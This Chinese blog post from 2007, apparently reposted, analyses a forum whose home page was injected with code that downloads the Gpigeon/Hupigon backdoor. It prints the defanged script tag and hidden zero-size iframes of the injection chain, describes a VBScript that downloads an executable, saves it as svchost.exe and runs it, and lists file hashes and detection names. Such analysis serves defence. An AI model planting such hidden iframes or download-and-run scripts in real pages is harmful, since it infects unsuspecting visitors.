首页 > 编程语言 >某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码

某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码

时间:2022-12-08 14:01:02浏览次数:35  
标签:exe 14 Gpigeon.2006 bbe ---- 灰鸽子 2007 ------ 31


endurer 原创

2007-01-31 第1

论坛首页包含代码:
/----
<script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"></script>
----/
AdOpen***.asp 中包含代码:
/----
<IFRAME frameBorder=0 height=0 scrolling=no src=hxxp://www***1*.site**e***m.com/***19/0**7/tx**049326/other/wu.htm width=0></IFRAME>
----/
wu.htm 中包含代码:
/----
<iframe src="xskj.htm" width="0" height="0" border="0"></iframe>
----/

xskj.htm 中包含“Ja va script”脚本代码,功能是调用upescape()输出字符串。
输出字符串是中包含多余空格的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 all.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。

/-----
文件说明符 : D:/test/all.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor                                          
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract               
源文件名 : WEXTRACT.EXE           
创建时间 : 2007-1-31 14:46:56
修改时间 : 2007-1-31 14:46:56
访问时间 : 2007-1-31 14:47:48
大小 : 418304 字节 408.512 KB
MD5 : d5dad180f81f12a01ab2b35cc72a8ed7
-----/

原来是使用Windows自带的安装程序制作软件iexpress来打包。

其中包含2个文件:
1)0113.exe
是个WinRAR制作的自解压文件:
/------
;下面的注释包含自释放脚本命令
Path=c:/
Silent=1
Overwrite=1
------/
释放到c:/的 0113.exe 采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo加壳。
/------
文件说明符 : D:/test/0113.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-1-14 17:48:12
修改时间 : 2007-1-31 15:6:57
访问时间 : 2007-1-31 15:8:35
大小 : 338944 字节 331.0 KB
MD5 : 818fefacaa3f7a2eafcfd2f0faa8acc3
------/
Kaspersky报为:Backdoor.Win32.Hupigon.czj
瑞星报为:Backdoor.Gpigeon.2006.bbe

2)kb.exe
采用GLBS Install Stub 32-bit -> Wise制作。
/------
文件说明符 : D:/test/kb.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-1-14 17:46:32
修改时间 : 2007-1-14 17:46:32
访问时间 : 2007-1-31 15:10:49
大小 : 8704 字节 8.512 KB
MD5 : 30916e8cca4b5afc05b41627de52e102
------/ 

标签:exe,14,Gpigeon.2006,bbe,----,灰鸽子,2007,------,31
From: https://blog.51cto.com/endurer/5921120

相关文章

  • 介绍一个不错的web测试工具webbench
    除了APACHE的AB工具外,发现linux下的一个工具webbench也很不错,传说能模拟3万个并发访问.下面介绍下安装1tarzxvfwebbench.tar.gz2make......
  • 198. House Robber
    给定一个整数数组Arr,求解数组中连续的不相邻元素的和的最大值。例如:对于数组中的元素A1,A2,A3,A4,则需要判断A1+A3,A1+A4,A2+A4中的最大值即为所求。 状态转移方程:dp[i]......
  • XAF Blazor TabbedMdi
    本文中的BlazorTabbedMdi是有偿的,感兴趣的可以加我QQ(120679402)前言XAF在WinForm中采用了多文档界面(MDI),但在Blazor中却没有,在官网中也有人提相关的问题,官方的回复是将来......
  • 灰鸽子木马特征值免杀
    目录木马特征值免杀一.木马特征值免杀0x01.灰鸽子配置生成木马0x02.使用MyCCL复合特征码定位器反复缩小目标进行定位0x03.直到定位到很小的区间0x04.用工具将文件偏移......
  • 又收到关于灰鸽子Backdoor.Gpigeon.uql的问题
    endurer2006-12-12第1版 有位网发来Email说,他的电脑从12月1日开始,每次系统启动瑞星都报告发现Backdoor.Gpigeon.uql,并附带了HijackThis扫描的log。在log中发现如下可......
  • ParaView中主显示区pqTabbedMultiViewWidget的对象层次
    ......
  • 198.house-robber 打家劫舍
    问题描述198.打家劫舍解题思路dp[i]表示考虑前i个房间,能窃取到的最大金额。考虑递推关系:假设第要窃取第i个房间,那么说明第i-1个房间,肯定没有被窃取,dp[i]=dp[i-......
  • 337.house-robber-iii 打家劫舍III
    问题描述337.打家劫舍III解题思路严格来说,这一题和198.打家劫舍,213.打家劫舍II的思路并不一致。首先,这一道题遍历的是树,而不是一个数组。要比较的是选择目前节点和目前......
  • 213.house-robber-ii 打家劫舍II
    问题描述213.打家劫舍II解题思路参照198.打家劫舍,但是这里多了一个首尾不能同时选择的选项,因此可以考虑将数组分成两部分,一个包含[0,n-1),一个包含[1,n),分别对应dp0......
  • 分享一个便于使用且轻量级的webapi调试工具,Postman的chrome浏览器插件“Tabbed Postma
    分享一个便于使用且轻量级的webapi调试工具,Postman的chrome浏览器插件“TabbedPostman-RESTClient”https://chrome.google.com/webstore/detail/tabbed-postman-rest......